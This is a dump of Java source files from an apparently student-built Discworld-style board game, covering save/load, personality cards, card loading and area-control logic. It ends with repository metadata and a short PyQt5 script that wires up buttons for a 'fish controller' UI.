                temp = temp + bCard.getNumber() + ",";
            } else if (this.players[i].getPlayerCards().get(j).getClass().toString().contains("GreenCard")){
                // The card is of type GreenCard, convert to green card.
                gCard = (GreenCard) this.players[i].getPlayerCards().get(j);
                temp = temp + gCard.getNumber() + ",";
            }else
            {
                System.out.println("ERROR(Class Game,function saveGame):The card is not of either Brown or green color.");
            }
        }
        temp = temp + this.players[i].getPlayerCityCard().size() + ",";
        for (int j = 0; j < this.players[i].getPlayerCityCard().size(); j++) {
            temp = temp + this.players[i].getPlayerCityCard().get(j).getCardNumber() + ",";
        }
        // remove last character(the coma)
        temp = removeLastChar(temp);
        // Add new player line to ArrayList.
        content.add(temp);
        temp = "";
    }
    temp = "";
    // Add the banks current bank balance to arraylist content.
    temp = temp + this.bank.getTotal();
    content.add(temp);
    // Write current game's state to disk.
    Saver.saveGameState(content);
    return "Save Was Successfull";
}
/**
* Remove last character of a string if it's a coma.
*
* @param str
* @return
*/
public String removeLastChar(String str) {
    // Trim exactly one trailing comma, if present; anything else (including
    // the empty string) passes through unchanged.
    boolean endsWithComma = !str.isEmpty() && str.endsWith(",");
    if (endsWithComma) {
        return str.substring(0, str.length() - 1);
    }
    return str;
}
/**
* Load a Game State from a txt. file.
*/
public String loadGame() {
    // Reads a save file (format produced by saveGame()) and rebuilds the
    // whole game: areas, players, decks, bank, die and player states.
    ArrayList<String> content = new ArrayList<String>();
    // Load SavedGame
    // Create Scanner Object
    String savedGame = "";
    System.out.println("Please enter the name of the file you wish to load:");
    savedGame = this.keyIn.next();
    // input.close();
    // Load new gameState into arraylist.
    content = Loader.loadGameState(savedGame);
    this.gameboard=new Gameboard();
    this.gameboard.resetAreas();// erase last state of the areas.
    // Parse Data and create new gameState.
    // temporary variables.
    String areaName = null; // NOTE(review): parsed below but never used; CityCard is rebuilt from index i instead — TODO confirm
    boolean troubleMarker = false;
    //boolean building = false;
    Colors buildingColor = Colors.NONE;
    int demon = 0;
    int troll = 0;
    //Load all areas (lines 0-11 of the save file).
    for (int i = 0; i < 12; i++) {
        // Array that will contain the color of the minions on a certain
        // area.
        ArrayList<Colors> minions = new ArrayList<Colors>();
        String[] parts = content.get(i).split(",");
        // Fixed field order: name, troubleMarker, buildingColor, demon,
        // troll, then one colour token per minion.
        for (int j = 0; j < parts.length; j++) {
            if (j == 0)
                areaName = parts[j];
            else if (j == 1)
                troubleMarker = Boolean.valueOf(parts[j]);
            else if (j == 2)
                buildingColor = Colors.valueOf(parts[j]);
            else if (j == 3)
                demon = Integer.parseInt(parts[j]);
            else if (j == 4)
                troll = Integer.parseInt(parts[j]);
            else
                minions.add(Colors.colorForString(parts[j]));
        }
        // Create new city card with the name extracted.
        CityCard cityCard = new CityCard(i);
        // Create Area and add to gameboard.
        Area area = new Area(cityCard, troubleMarker,buildingColor, demon, troll);
        // (cityCard,troubleMarker,building,demon,troll) ==> Constructor
        // parameters.
        this.gameboard.addArea(area);
        this.gameboard.addCityCard(cityCard);
        // Add the minions that where in the current area.
        for (int j = 0; j < minions.size(); j++)
            area.addMinion(new Piece(minions.get(j)),true);
    }
    // savedGame="Test.txt";
    // Get Number of Players(Always at line 12(in array))
    int numberPlayers = Integer.parseInt(content.get(12));
    this.numberOfPlayers = numberPlayers;
    /**
     * Parse PLayers information. Reset Last state of players.
     */
    this.players = null;
    // Set new number players.
    this.players = new Player[numberPlayers];
    PersonalityCard perCard = null;
    Colors color = null;
    int minionOnHand = 0;
    int buildingOnHand = 0;
    int money = 0;
    int NumplayerCards = 0;
    int NumcityCards = 0;
    this.decks = new HashMap<String, Deck>();
    this.decks.clear();//erase all previous decks.
    //Initialize all decks for this loaded game (same lowercase keys as init()).
    this.decks.put("discard", new Deck("D", this.numberOfPlayers));
    this.decks.put("personalities", new Deck("P", this.numberOfPlayers));
    this.decks.put("events", new Deck("E", this.numberOfPlayers));
    this.decks.put("green", new Deck("G", this.numberOfPlayers));
    this.decks.put("brown", new Deck("B", this.numberOfPlayers));
    // Start at position 13 after areas and # of players.
    for (int i = common.beginingOfPlayersLoadGame; i < common.beginingOfPlayersLoadGame + numberPlayers; i++)
    {
        String[] parts = content.get(i).split(",");
        int playerIndex = i % common.beginingOfPlayersLoadGame;// Index for array players, it starts at 0.
        // Fixed field order: personality index, colour, minions, buildings,
        // money, #playerCards, the card ids, #cityCards, the city card ids.
        for (int j = 0; j < parts.length; j++) {
            if (j == 0)
                perCard = new PersonalityCard(Integer.parseInt(parts[j]),this.numberOfPlayers);
            else if (j == 1)
                color = Colors.colorForString(parts[j]);
            else if (j == 2)
                minionOnHand = Integer.parseInt(parts[j]);
            else if (j == 3)
                buildingOnHand = Integer.parseInt(parts[j]);
            else if (j == 4)
                money = Integer.parseInt(parts[j]);
            else if (j == 5) {
                NumplayerCards = Integer.parseInt(parts[j]);
            } else if (j == (5 + NumplayerCards) + 1) {
                NumcityCards = Integer.parseInt(parts[j]);
            }
        }
        //Remove Personality card from City card deck.
        Deck personalities=this.decks.get("personalities");
        boolean success=personalities.deleteCard(perCard);
        if(!success)
            System.out.println("Personality Card couldn't be removed from the personality deck.(Class Game-Fucntion LoadGame)");
        //System.out.println(personalities.getSizeDeck());
        //personalities.displayCardsinDeck(personalities.getSizeDeck());
        // Create and add new Player
        this.players[playerIndex] = new Player(perCard, color, minionOnHand, buildingOnHand, money);
        // Add player'sCards
        for (int j = 0; j < NumplayerCards; j++) {
            // Brown cards have int values of 1-53 and green cards have
            // int values of 54-101.
            int checkColor = Integer.parseInt(parts[(5 + j) + 1]);
            Card card = new Card(false, false); // City cards are always
            // visible.
            if (checkColor < 54)// This is a Brown card
                card = new BrownCard(checkColor);
            else if (checkColor >= 54)
                card = new GreenCard(checkColor);
            this.players[playerIndex].receiveCard(card);
        }
        Deck deck=null;
        //remove all the cards the player just received from the correct deck.
        for(int j = 0;j<this.players[playerIndex].getPlayerCards().size();j++)
        {
            if(this.players[playerIndex].getPlayerCards().get(j).getClass().toString().contains("GreenCard"))
            {
                deck=this.getEspecificDeck("green");
                success=deck.deleteCard(this.players[playerIndex].getPlayerCards().get(j));//TODO:check if it returns true.
                if(!success)
                    System.out.println("Green Card couldn't be removed from the Green deck.(Class Game-Fucntion LoadGame)");
            }else if(this.players[playerIndex].getPlayerCards().get(j).getClass().toString().contains("BrownCard"))
            {
                deck=this.getEspecificDeck("brown");
                deck.deleteCard(this.players[playerIndex].getPlayerCards().get(j));//TODO:check if it returns true.
            }
        }
        // Add CityCards.
        for (int j = 0; j < NumcityCards; j++) {
            // Get CityCard number.
            int cardNumber = Integer.parseInt(parts[(5 + NumplayerCards + (j + 1)) + 1]);
            //Get corresponding cityCard
            CityCard cityCard=this.gameboard.getAreaByCityCard(cardNumber).getCityCard();
            //delete city card from beard and give it to the player.
            this.gameboard.deleteCardFromDeck(cityCard);
            this.players[playerIndex].receiveCityCard(cityCard);
        }
    }// PLayers
    /** Parse BankMoney Get money bank has. **/
    this.bank = Bank.getInstance();
    // NOTE(review): literal 13 duplicates common.beginingOfPlayersLoadGame
    // used above — keep the two in sync if the layout ever changes.
    int bankMoney = Integer.parseInt(content.get(13+this.numberOfPlayers));
    AtomicInteger aInt = new AtomicInteger(bankMoney);
    this.bank.setBankMoney(aInt);// Set new bank balance.
    this.currentPlayer=0;
    //Create new die.
    this.die = new Die();
    // Depending on the number of players initialize their States(to wait).
    // NOTE(review): playerStatus is allocated twice in a row; the second
    // allocation makes the first (and the clear()) redundant.
    playerStatus = new ArrayList<StateContext>();// put on heap.
    this.playerStatus.clear();
    this.playerStatus = new ArrayList<StateContext>();// put on heap.
    for (int i = 0; i < numberOfPlayers; i++) {
        playerStatus.add(new StateContext());
        System.out.println("Player:" + players[i].getColor() + " Current State:" + playerStatus.get(i).getState());
        /**
         * Set to next state(Play State.)So players are ready to play when
         * their turn comes up.
         */
        playerStatus.get(i).performAction(players[i], this);
    }
    //Update all the player's hand(minions on play). Put all the minions a player has on the board.
    ArrayList<Area> areas=this.gameboard.getAreas();
    ArrayList<Piece>pieces;
    Player selectPlayer;
    for(int i=0;i<areas.size();i++ )
    {
        pieces = areas.get(i).getMinions();
        for(int j=0;j<pieces.size();j++)
        {
            selectPlayer= this.getPlayerByColor(pieces.get(j).getColor());
            selectPlayer.putNewMinionOnBoard(areas.get(i).getCityCard().getCardNumber(),true);
        }
    }
    return "Load Was Successfull";
}
/**
* Get a Player using a color.
*
* @param color
* (Color)
* @return Player
*/
public Player getPlayerByColor(Colors color) {
    // Linear scan; player colours are unique, so the first match is the
    // only match. Returns null when no player has the requested colour.
    for (Player candidate : this.players) {
        if (candidate.getColor().equals(color)) {
            return candidate;
        }
    }
    return null;
}
/**
* Prints Information about current game.
*/
public void printCurrentState() {
    // Console dump: global counters, then per-player money/net-worth and
    // the areas where that player owns a building.
    System.out.println("Current Game Status:" + "\n");
    System.out.println("Number Of Players:" + this.numberOfPlayers);
    System.out.println("Bank balance:" + this.bank.getTotal() + "\n");
    System.out.println("Players:");
    for (int i = 0; i < this.players.length; i++) {
        System.out.println();
        System.out.println("Player" + (i + 1) + ":");
        System.out.println("Money: "+this.players[i].getMoney());
        System.out.println("NetWorth: "+this.players[i].calculateNetWorth(this.gameboard));
        System.out.println("Player: "+this.players[i].getColor()+" has buldings in the following areas:");
        // An area belongs to this player when its building colour matches.
        for(int j=0;j<this.gameboard.getAreas().size();j++)
        {
            if(this.players[i].getColor().equals(this.gameboard.getAreas().get(j).getBuildingColor()))
                System.out.println("Area: "+this.gameboard.getAreas().get(j).getCityCard().getName()+" ;Building Cost:"+this.gameboard.getAreas().get(j).getCityCard().getBuldingCost());
        }
        //System.out.println(this.players[i].toString());
    }/*
    System.out.println("Game Board State:");
    System.out.println(this.gameboard.toString());
    */
}
// Getters
/**
 * Getter: array with players (live reference, not a copy).
 *
 * @return Player[]
 */
public Player[] getPlayers() {
    return this.players;
}
/**
 * Getter: the decks from the game, keyed by lowercase name
 * ("discard", "personalities", "events", "green", "brown").
 *
 * @return Map<String, Deck>
 */
public Map<String, Deck> getDecks() {
    return this.decks;
}
/**
 * Getter: the requested deck, or null for an unknown key.
 *
 * @param whichDeck lowercase deck name
 * @return Deck
 */
public Deck getEspecificDeck(String whichDeck) {
    return this.decks.get(whichDeck);
}
/**
 * Getter: Game Die.
 *
 * @return Die
 */
public Die getDie() {
    return this.die;
}
/**
 * Getter: Returns number of players
 *
 * @return int
 */
public int getNumberOfPlayers() {
    return this.numberOfPlayers;
}
/**
 * Getter: the size of the brown deck, used as a proxy for whether the draw
 * pile is exhausted (the brown cards sit at the bottom of the combined
 * deck, so the draw pile is empty exactly when the brown deck is).
 *
 * @return int number of cards left in the brown deck
 */
public int getSizeDrawDeck() {
    // BUG FIX: the decks map is populated with lowercase keys ("brown",
    // "green", ...) in both init() and loadGame(); the previous lookup of
    // "Brown" always returned null and this method threw a
    // NullPointerException on every call.
    Deck brownDeck = this.decks.get("brown");
    return brownDeck.getSizeDeck();
}
/**
 * Getter: the game's current GameBoard.
 *
 * @return Gameboard
 */
public Gameboard getGameBoard() {
    return this.gameboard;
}
/**
 * Getter: index of the player whose turn it is (-1 before the game starts).
 *
 * @return int
 */
public int getCurrentPlayer() {
    return this.currentPlayer;
}
/**
 * Calculate who won the Game. Called when the the brown deck is empty or when the event card Riots is activated and there are 8 or more trouble markers on the gameboard.
 *
 * NOTE(review): several suspected defects here, flagged rather than changed
 * because the intended loan rules are not visible in this file:
 * - canPay divides loan by money; presumably it should be money / 12
 *   (each loan repays $12) — TODO confirm against the rulebook.
 * - the net-worth/points lines only run for players WITH loans, so
 *   loan-free players never get a score printed.
 * - the "winner" announcement prints once per loop iteration instead of
 *   once after the loop, and no player is actually compared/selected.
 */
public void CalculateAWinner()
{
    double canPay=0;
    for(int i=0;i< this.players.length;i++)
    {
        if(players[i].getLoan()>0)
        {//Player has loans
            canPay=Math.floor(players[i].getLoan()/players[i].getMoney());
            System.out.println("Player: "+players[i].getColor()+ " can pay for: "+canPay +" of the loans he took.");
            players[i].payLoan((int)canPay*12);//Pay available loans
            if(players[i].getLoan()>0)//If he still has loans but can't pay substract 15 points
            {
                players[i].setMoney(players[i].getMoney()-15);
                players[i].setloan(0);
            }
            //Calculate networth
            int netWorth=players[i].calculateNetWorth(this.gameboard);
            //Calculate minions on the board.
            int numMinions=12-players[i].getMinionsOnHand();
            int points=netWorth+numMinions;
            System.out.println("Player: "+players[i].getColor()+" has a total of: "+points+ "points.");
        }
        System.out.println("The player with the highest points is the winner. Congratulations.");
    }
}
}
<file_sep>package ca.concordia.game.model;
import ca.concordia.game.common.common.Colors;
/**
* This class will only contain the color of the Piece.
* @author <NAME>
* @author <NAME>
* @author <NAME>
* @author <NAME>
* @author <NAME>
*/
public class Piece {

    /** Colour identifying which player this piece (minion) belongs to. */
    private Colors color;

    /**
     * Creates a piece owned by the player of the given colour.
     *
     * @param color owning player's colour
     */
    public Piece(Colors color) {
        this.color = color;
    }

    /**
     * Returns the colour of this piece (minion).
     *
     * @return the owning colour
     */
    public Colors getColor() {
        return color;
    }

    /**
     * Human-readable description of this piece; reports a missing colour
     * when none was assigned.
     */
    @Override
    public String toString() {
        return (color == null) ? "Color is missing" : "Color: " + color.toString();
    }
}
<file_sep>package ca.concordia.game.model;
/**
*PersonalityCard is a card that contains seven possible personalities that players could get.
*Each PersonalityCard has a specific winning condition for each personality it represents.
*
*
*@author <NAME>
*@author <NAME>
*@author <NAME>
*@author <NAME>
*@author <NAME>
*/
public class PersonalityCard extends Card {
    /** Human-readable rule text for this personality's winning condition. */
    public String winningConditionDescription = null;
    private int cardId;              // 1-based id; saveGame() stores cardId-1 as the constructor index
    private int numberOfPlayers;     // player count the thresholds below were derived from
    private boolean numPlayActive;   // true when the winning condition depends on player count
    private int numMinionsOnAreas;   // areas-with-minions threshold, -1 when unused
    private int controlAreas;        // controlled-areas threshold, -1 when unused
    private int numTroubleMarkers;   // trouble-marker threshold, -1 when unused
    private int netWorth;            // net-worth threshold, -1 when unused
    private int drawPile;            // draw-pile-empty marker (0), -1 when unused
    /**
     * Constructor: depending on the index sent it creates one of the seven
     * different personality cards, configuring the winning-condition
     * thresholds for the given number of players.
     *
     * @param i               personality index (0-6)
     * @param numberOfPlayers players in this game (2-4); scales thresholds
     */
    public PersonalityCard(int i,int numberOfPlayers) {
        //Personality Cards are not Playable or Visible!
        super(false,false);
        this.numberOfPlayers=numberOfPlayers;//set number of players for winning conditions.
        //not all winning conditions require the same variables: -1 marks "unused".
        this.numPlayActive=false;
        this.numMinionsOnAreas=-1;
        this.controlAreas=-1;
        this.numTroubleMarkers=-1;
        this.netWorth=-1;
        this.drawPile=-1;
        switch(i) {
        case 0:
            this.setName("Lord Vetinari");
            this.cardId=1;
            this.winningConditionDescription = "Has minions on different areas that don't have demons on them.2 players-11 areas,3 players-10 areas,4 players-9 areas";
            this.numPlayActive=true;
            //Set winning condition depending on number of players.
            if( numberOfPlayers == 2 )
                this.numMinionsOnAreas = 11;
            else if(numberOfPlayers ==3 )
                this.numMinionsOnAreas=10;
            else if(numberOfPlayers == 4 )
                this.numMinionsOnAreas = 9;
            break;
        case 1:
            this.setName("<NAME>");
            this.winningConditionDescription="If at the start of your turn you have clear control of a certain number of areas then you win the game immediately. With two players you need to control seven areas, with three players you need to control five areas, and with four players you need to control four areas.";
            this.cardId=2;
            this.numPlayActive=true;
            //Set winning condition depending on number of players.
            if(numberOfPlayers ==2)
                this.controlAreas=7;
            else if(numberOfPlayers ==3)
                this.controlAreas=5;
            else if(numberOfPlayers ==4)
                this.controlAreas=4;
            break;
        case 2:
            this.setName("Dragon King of Arms");
            this.cardId=3;
            this.winningConditionDescription = "If at the start of your turn there are 8 or more trouble markers on the board then you win the game immediately";
            this.numTroubleMarkers=8;
            break;
        case 3:
            this.setName("<NAME>");
            this.cardId=4;
            this.numPlayActive=true;
            this.winningConditionDescription ="If at the start of your turn you have clear control of a certain number of areas then you win the game immediately. With two players you need to control seven areas, with three players you need to control five areas, and with four players you need to control four areas";
            //Set winning condition depending on number of players.
            if(numberOfPlayers ==2)
                this.controlAreas=7;
            else if(numberOfPlayers ==3)
                this.controlAreas=5;
            else if(numberOfPlayers ==4)
                this.controlAreas=4;
            break;
        case 4:
            this.setName("<NAME>");
            this.cardId=5;
            // BUG FIX: the description was assigned twice; the second, terse
            // "Draw Pile Exhausted." silently overwrote the full rule text.
            // Keep the descriptive sentence, matching the other cases.
            this.winningConditionDescription="If the game ends due to the cards running out then you win the game.";
            this.drawPile=0;
            break;
        case 5:
            this.setName("<NAME>");
            this.winningConditionDescription="Control If at the start of your turn you have clear control of a certain number of areas then you win the game immediately. With two players you need to control seven areas, with three players you need to control five areas, and with four players you need to control four areas";
            this.cardId=6;
            this.numPlayActive=true;
            //Set winning condition depending on number of players.
            if(numberOfPlayers ==2)
                this.controlAreas=7;
            else if(numberOfPlayers ==3)
                this.controlAreas=5;
            else if(numberOfPlayers ==4)
                this.controlAreas=4;
            break;
        case 6:
            this.setName("Chrysoprase");
            this.winningConditionDescription="If at the start of your turn you have a combined worth of $50 or more (money in hand plus buildings you have built), then you win the game. Each loan you have counts as $ 12 against your total.";
            this.cardId=7;
            this.netWorth=50;
            break;
        default:
            System.out.println("Initializing Personality Card with the wrong index");
            break;
        }
    }
    /**
     * Getter : returns the number of trouble markers in the board required to win a game.
     * @return int (-1 when this personality does not use this condition)
     */
    public int getNumTroubleMarkers()
    {
        return this.numTroubleMarkers;
    }
    /**
     * Getter: returns the number of controlled areas required to win the game.
     * @return int (-1 when this personality does not use this condition)
     */
    public int getControlledAreas()
    {
        return this.controlAreas;
    }
    /**
     * Getter: returns the number of areas with a minion that are required to win.
     * @return int (-1 when this personality does not use this condition)
     */
    public int getNumMinionsOnAreas()
    {
        return this.numMinionsOnAreas;
    }
    /**
     * Getter: cardID (1-based).
     * @return int
     */
    public int getCardId()
    {
        return this.cardId;
    }
    /**
     * ToString method: name plus winning-condition text.
     * @return String
     */
    public String toString()
    {
        return this.getName()+":" +this.winningConditionDescription;
    }
    /**
     * Getter: winning conditions description.
     * @return String
     */
    public String getWinningConditionDescription()
    {
        return this.winningConditionDescription;
    }
}
<file_sep>package ca.concordia.game.util;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Map;
import java.util.Map.Entry;
import ca.concordia.game.common.common.Colors;
import ca.concordia.game.model.BrownCard;
import ca.concordia.game.model.GreenCard;
public class CardLoader {
    private static CardLoader instance = null; // lazy singleton
    private ArrayList<String> cards;           // NOTE(review): sized but never populated
    private String temp;                       // scratch slot written by getCard(), read by the *ForCard helpers
    /**
     * The first map works with raw strings, and the others with real objects
     * Using the Map<Integer, String>
     * Using the Map<Integer, Card>
     */
    private Map<Integer, String> mcards;
    private Map<Integer, BrownCard> brownCards;
    private Map<Integer, GreenCard> greenCards;
    /**
     * Implements CardLoader as a singleton.
     * @return CardLoader
     */
    public static CardLoader getInstance() {
        if(instance == null) {
            instance = new CardLoader();
        }
        return instance;
    }
    /**
     * This constructor loads Green and Brown cards into re-usable data
     * structures. Each property value is pipe-separated:
     * id|colour-letter|name|...|symbols|ability.
     */
    protected CardLoader() {
        String data = "";
        int index = -1;
        cards = new ArrayList<String>();
        mcards = new HashMap<Integer, String>();//
        greenCards = new HashMap<Integer, GreenCard>();
        brownCards = new HashMap<Integer, BrownCard>();
        cards.ensureCapacity( Configuration.PLAYER_PROPERTIES.size() );
        for( Entry<Object, Object> property : Configuration.PLAYER_PROPERTIES.entrySet() ){
            data = property.getValue().toString();
            String[] extracted = data.split("\\|");
            index = Integer.parseInt( extracted[0] );
            int number = index;
            String name = extracted[2];
            // BUG FIX: 'extracted[1] == "B"' compared String REFERENCES and
            // was always false (split() allocates fresh strings), so every
            // card was classified GREEN. Use value equality instead.
            Colors color = "B".equals(extracted[1]) ? Colors.BROWN : Colors.GREEN;
            String ability = extracted.length >= 6 ? extracted[5] : "";
            if( color == Colors.BROWN ){
                //brownCards.put(new Integer(index), new BrownCard(index, name, color, ability));
            }else{
                //greenCards.put(new Integer(index), new GreenCard(index, name, color, ability));
            }
            mcards.put( new Integer(index) , data );
        }
    }
    /**
     * Returns the display name for card id i of the given type, or an
     * error/placeholder string when unavailable.
     */
    public String nameForCard(int i, char type){
        temp = "";
        getCard(i,type);//Get card.
        if(temp.contains("Index doesn't exist:"))
            return temp;
        String resp = "NO NAME AVAILABLE";
        if( temp.isEmpty() ){
            return resp;
        }
        String[] arr = temp.split("\\|");
        if( arr.length > 2 ){
            resp = arr[2]; // field 2 is the card name
        }
        return resp;
    }
    /**
     * Returns the ability text for card id i of the given type, or an
     * error/placeholder string when unavailable.
     */
    public String abilityForCard(int i,char type){
        temp = "";
        getCard(i,type);//Get card.
        if(temp.contains("Index doesn't exist:")){
            return temp;
        }
        String resp = "NO ABILITY AVAILABLE";
        String[] arr = temp.split("\\|");
        if( arr.length > 5 ){
            resp = arr[5]; // field 5 is the ability text
        }
        return resp;
    }
    /**
     * Returns the symbols field for card id i of the given type, or an
     * error/placeholder string when unavailable.
     */
    public String symbolsForCard(int i,char type){
        temp = "";
        getCard(i,type);//Get card.
        if(temp.contains("Index doesn't exist:")){
            return temp;
        }
        String resp = "NO Symbols AVAILABLE";
        String[] arr = temp.split("\\|");
        if(arr.length > 4){
            resp = arr[4]; // field 4 holds the symbols
        }
        return resp;
    }
    /**
     * getCard loads the raw record for card id i and type into this.temp.
     * Brown ids are 1-53, green ids 54+ (the 'B' branch does not reject
     * green-range ids — callers pass the matching type).
     * @param i(int) card id
     * @param type(char) 'B' for brown, 'G' for green
     */
    private void getCard(int i,char type) {
        temp = "";
        switch(type) {
        case 'B':
            if (i > 0) {
                temp = mcards.get( i );
            }
            break;
        case 'G':
            if(i >= 54) {
                temp = mcards.get(i);
            } else {
                temp= "Index doesn't exist: " + i;
            }
            break;
        default:
            break;
        }
        // ROBUSTNESS FIX: an id absent from mcards made get() return null,
        // and the callers then crashed with a NullPointerException in
        // temp.contains(...). Report it like an out-of-range index instead.
        if (temp == null) {
            temp = "Index doesn't exist: " + i;
        }
    }
}
<file_sep>package ca.concordia.game.model;
import java.util.HashMap;
import java.util.Map;
import java.util.ArrayList;
import java.util.Map.Entry;
import ca.concordia.game.common.common.Colors;
/**
* Class Area contains the possible object that could be available to an area.
*
* @author <NAME>
* @author <NAME>
* @author <NAME>
* @author <NAME>
* @author <NAME>
*/
//TODO: Come up with a way to set restrictions on area when a demon is on it.
public class Area {
private CityCard cityCard;//A city card belongs to an Area.
private ArrayList<Piece> minions;
private boolean troubleMarker;
private boolean building;
private Colors buildingColor;
private int demon;
private int troll;
/**
* Constructor for new game.
* @param cityCard
*/
public Area(CityCard cityCard)
{
this.cityCard = cityCard;
this.troubleMarker = false;
this.building = false;
this.buildingColor = Colors.NONE;
this.demon = 0;
this.troll = 0;
minions= new ArrayList<Piece>();
}
/**
* Constructor for loaded game. Reset everything.
* @param cityCard
* @param troubleMarker
* @param building
* @param demon
* @param troll
*/
public Area(CityCard cityCard,boolean troubleMarker,Colors buildingColor,int demon,int troll)
{
this.cityCard=cityCard;
this.troubleMarker=troubleMarker;
//Modify this.building=building;
this.buildingColor=buildingColor;
if(this.buildingColor.equals(Colors.NONE))
this.building=false;
else
this.building=true;
this.demon=demon;
if(this.demon>0)
this.getCityCard().setIsActive(false);//Make city card not active
this.troll=troll;
minions= new ArrayList<Piece>();
}
/**
* Checks if the color of a player controls the area.Returns true if it does otherwise it returns false.
* @param color(Colors)
* @return boolean
*/
public boolean controlsArea(Colors color)
{
//Map will contain the number of minions from each player currently on this area.
Map<Colors,Integer> playerMinions=new HashMap<Colors,Integer>();
//All possible players.
playerMinions.put(Colors.RED, new Integer(0));
playerMinions.put(Colors.BLUE,new Integer(0));
playerMinions.put(Colors.YELLOW, new Integer(0));
playerMinions.put(Colors.GREEN, new Integer(0));
Colors currentColor= Colors.NONE;
for(int i=0;i<this.minions.size();i++)
{
currentColor=this.minions.get(i).getColor();
playerMinions.put(currentColor,playerMinions.get(currentColor)+1);
}
if(this.building)//if true a building exists
{
int number= playerMinions.get(buildingColor);
number=number+1;
playerMinions.put(buildingColor, number);
}
//Get the entry with the maximum value in the HashMap.
Entry<Colors,Integer> maxEntry = null;
for(Entry<Colors,Integer> entry : playerMinions.entrySet()) {
if (maxEntry == null || entry.getValue() > maxEntry.getValue()) {
maxEntry = entry;
}
}
//check if there's a player with the same number of playing pieces.
playerMinions.remove(maxEntry.getKey());
Entry<Colors,Integer> maxEntry2 = null;
for(Entry<Colors,Integer> entry : playerMinions.entrySet()) {
if (maxEntry2 == null || entry.getValue() > maxEntry2.getValue()) {
maxEntry2 = entry;
}
}
//If two or more players have the same number of playing pieces then no one controls the area. Or if there is an equal or greater number of trolls
//than player pieces in the current area then there's no control of the area.
if(maxEntry.getValue() == maxEntry2.getValue() || maxEntry.getValue()< this.troll)
{
return false;
}
//Check if the color of the player being checked is the same as the one that has the most playing cards on the area.
if(maxEntry.getKey()==color)
return true;
else
return false;
}
/**
* Getter
* @return CityCard
*/
public CityCard getCityCard()
{
return this.cityCard;
}
/**
* Getter
* @return boolean
*/
public boolean getTroubleMarker()
{
return this.troubleMarker;
}
/**
* Getter
* @return boolean
*/
public boolean getBuilding()
{
return this.building;
}
/**
* Getter
* @return int
*/
public int getDemon()
{
return this.demon;
}
/**
* Getter
* @return int
*/
public int getTroll()
{
return this.troll;
}
/**
* Getter
* @return ArrayList<Piece>
*/
public ArrayList<Piece> getMinions()
{
return this.minions;
}
/**
* Getter
* @return Colors
*/
public Colors getBuildingColor()
{
return this.buildingColor;
}
/**
*
* toString method for Area Class.
*/
@Override
public String toString()
{
String info="Area Name: "+ this.cityCard.getName()+" ." + " Trouble Marker: "+this.troubleMarker+". Building: "+this.building+" ."+ " Building Color: "+this.buildingColor+" .";
info= info+ " Demons: "+this.demon+ ". Trolls: "+this.troll +" .\n";
String info2="Minions in current area: ";
for(int i=0;i<this.minions.size();i++)
{
info2=info2+ this.minions.get(i).toString()+", ";
}
info2=info2+"\n\n";
return info+info2;
}
/**
* Add a minion to area; if the area already contains one or more minions add a trouble marker.
* @param minion
*/
public void addMinion(Piece minion,boolean loading)
{
//Only add trouble markers if the game was not loaded.
if(loading == false)
if(this.getMinions().size()>=1 || this.getDemon()>=1 || this.getTroll()>=1)//There is already at least one minion in the area or at least one demon or at least one troll.
this.troubleMarker=true;//add a trouble marker.
this.minions.add(minion);
}
//TODO: Check if we can remove the trouble marker from here as well.
/**
* Add a minion to area. Returns true if successful otherwise it returns false.
* @param minion
* @return boolean
*/
public Piece removeMinion(Colors color)
{
//this.minions.remove(minion);
for(int i=0;i<minions.size();i++)
{
if(minions.get(i).getColor() == color)
return this.minions.remove(i);
}
return null;
}
/**
* Add troubleMarker to area if possible(Only one trouble marker is allowed per area). Return true if successful else return false.
* @return boolean
*/
public boolean addTroubleMarker(){
if(this.troubleMarker==false ){
//There's no trouble marker on this area.
this.troubleMarker=true;
return true;
}else{
//A trouble marker already exists on this area.
return false;
}
}
/**
* remove troubleMarker to area if possible(Only one trouble marker is allowed per area). Return true if successful else return false.
* @return boolean
*/
public boolean removeTroubleMarker()
{
if(this.troubleMarker==true )//There's a trouble marker on this area.
{
this.troubleMarker=false;
return true;
}else
{//A trouble marker already exists on this area.
return false;
}
}
/**
* Add Building to area if possible(Only one Bulding is allowed per area). Also set the color of the building.
* @return boolean
*/
public boolean addBuilding(Player player)
{
if(this.building==false)//There's no trouble marker on this area.
{
this.building=true;
this.buildingColor=player.getColor();
return true;
}else
{//A trouble marker already exists on this area.
return false;
}
}
/**
* Add Building to area if possible(Only one Building is allowed per area).Also remove color from building.
* Return true if successful else return false.
* @return boolean
*/
public boolean removeBuilding()
{
if(this.building==true)//There's no trouble marker on this area.
{
this.building=false;
this.buildingColor=Colors.NONE;
return true;
}else
{//A trouble marker already exists on this area.
return false;
}
}
/**
* Add or remove demon to area. If the argument is 1 then it will add a demon else if it is 2 it will remove a demon if possible.
* Will return a boolean depending on weather the action was successful.further it will add a trouble marker even if there are no minions or trolls
* in the area.
* @param addRemove
* @return boolean
*/
public boolean addRemoveDemon(int addRemove)
{
if(addRemove==1)//add demon
{
this.demon++;
boolean check=this.addTroubleMarker();
if(check)
System.out.println("Added a trouble marker.");
this.getCityCard().setIsActive(false);//Make city card not active
return true;
}else if (addRemove==2)//remove demon if possible
{
if(this.demon >0)
{
this.demon--;
if(this.getDemon()==0)//If there are no more demons on the area. Set the city card to active.
this.getCityCard().setIsActive(true);
return true;
}else
return false;
}
return false;
}
/**
* Add or remove troll to area. If the argument is 1 then it will add a troll else if it is 2 it will remove a troll if possible.
* Will return a boolean depending on weather the action was successful. further it will add a trouble marker if there's already a
* minion,demon or another troll in the area.
* @param addRemove
* @return boolean
*/
public boolean addRemoveTroll(int addRemove){
if( addRemove == 1 ){
//add troll
this.troll++;
//Add trouble marker of applicable.
if(this.demon>0 || this.minions.size()>0 || this.troll>0)
{
boolean check=this.addTroubleMarker();
if(check)
System.out.println("Added a trouble marker.");
}
return true;
//remove troll if possible
}else if ( addRemove == 2 ){
if( this.troll > 0 ){
this.troll--;
return true;
}else{
return false;
}
}
return false;
}
}
| c441ebee3f5ed31122ba5c7115c87cd61ae3520d | [
"Java"
] | 11 | Java | murindwaz/TM23 | b7e0a5bc023cf8b02780eb32611bf963a3e346ec | 90756cbb0ce8cb19d57391de407e8fa6f3cd4ef0 |
refs/heads/master | <file_sep>from PyQt5 import uic
from PyQt5.QtWidgets import QApplication, QMessageBox
from PyQt5 import uic
import sys
def run():
print("program run")
global A
A = ui.time1.text()
def save():
global A
A = 'B'
app = QApplication([])
ui = uic.loadUi('UI/fish_controller.ui')
ui.run.clicked.connect(run)
ui.save.clicked.connect(save)
